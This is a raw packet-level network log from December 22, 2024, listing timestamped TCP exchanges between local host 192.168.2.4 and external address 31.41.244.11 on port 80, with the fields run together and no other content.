                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.808161974 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.810777903 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.810842037 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.810913086 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.811142921 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.814127922 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.814253092 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.814318895 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.818821907 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.818862915 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.819070101 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.823050976 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.823122025 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.823524952 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.823585987 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.827193022 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.827390909 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.827627897 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.831511021 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.831639051 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.831705093 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.835997105 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.836051941 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.836281061 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.840377092 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.840445995 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.840604067 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.844404936 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.844501019 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.844573975 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.848567963 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.848656893 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.848736048 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.852756023 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.852817059 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.853013039 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.857117891 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.857156038 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.857204914 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.857204914 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.861238003 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.861339092 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.861555099 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.865793943 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.865879059 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.866091967 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.869997025 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.870053053 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.870193958 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.874308109 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.874360085 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.874459982 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.878407001 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.878453970 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.878655910 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.882738113 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.882790089 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.882882118 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.887145996 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.887200117 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.887418032 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.891483068 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.891535044 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.891844034 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.895503044 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.895558119 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.895756960 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.899585009 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.899811983 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.900005102 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.903995037 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.904572964 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.006500959 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.006552935 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.006625891 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.006627083 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.007885933 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.007937908 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.007951975 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.007994890 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.011259079 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.011360884 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.011379957 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.011466026 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.014204025 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.014262915 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.014370918 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.014370918 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.017549038 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.017600060 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.017746925 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.017748117 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.020656109 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.020693064 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.020848036 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.020848036 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.023565054 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.023664951 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.023812056 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.023812056 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.026571989 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.026608944 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.026659012 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.026659966 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.029581070 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.029628038 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.029648066 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.029681921 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.032284021 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.032434940 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.032522917 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.032524109 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.034665108 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.034699917 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.034723997 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.034755945 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.038316965 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.038362980 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.038408995 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.038408995 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.040091991 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.040164948 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.040244102 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.040244102 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.042963028 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.043064117 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.043070078 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.043147087 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.045911074 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.045965910 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.046046972 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.046046972 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.048809052 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.048880100 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.049046993 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.049047947 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.051768064 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.051945925 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.051976919 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.052032948 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.054563999 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.054774046 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.054972887 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.055042982 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.057473898 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.057533979 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.057542086 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.057588100 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.061355114 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.061397076 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.061445951 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.061445951 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.064188957 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.064404011 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.064639091 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.064817905 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.067265034 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.067305088 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.067363977 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.067363977 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.069987059 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.070139885 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.070219994 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.070219994 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.072968960 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.073004961 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.073041916 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.073075056 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.076250076 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.076303005 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.076317072 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.076342106 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.078902006 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.078957081 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.078974009 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.079000950 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.081701994 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.081789970 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.081878901 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.081878901 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.084561110 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.084635973 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.084717989 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.084779024 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.087460995 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.087580919 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.087683916 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.087685108 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.090346098 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.090380907 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.090444088 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.090444088 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.093328953 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.093364000 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.093398094 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.093492031 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.096170902 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.096205950 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.096400976 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.096401930 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.099417925 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.099486113 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.099797010 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.099852085 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.101783037 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.101840973 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.101927996 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.101984978 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.104955912 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.104990005 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.105179071 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.105180025 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.107806921 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.107889891 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.107928038 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.107991934 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.110644102 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.110680103 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.110724926 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.110797882 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.113801003 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.113856077 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.114012957 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.114012957 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.116679907 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.116718054 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.116899014 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.116899014 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.119424105 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.119497061 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.119501114 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.119577885 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.122411013 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.122462988 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.122626066 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.122626066 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.190278053 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.190321922 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.190505028 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.190505981 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.190931082 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.190983057 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.191111088 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.191111088 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.193371058 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.193449020 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.193528891 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.193583012 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.195286989 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.195378065 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.195403099 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.195470095 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.197793961 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.197858095 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.197900057 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.197953939 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.200313091 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.200351000 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.200407028 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.200437069 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.202711105 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.202841043 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.202847004 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.202925920 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.205106974 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.205205917 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.205291033 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.205497026 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.207436085 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.207506895 CET4983080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.207536936 CET804983031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:38.207592010 CET4983080192.168.2.431.41.244.11
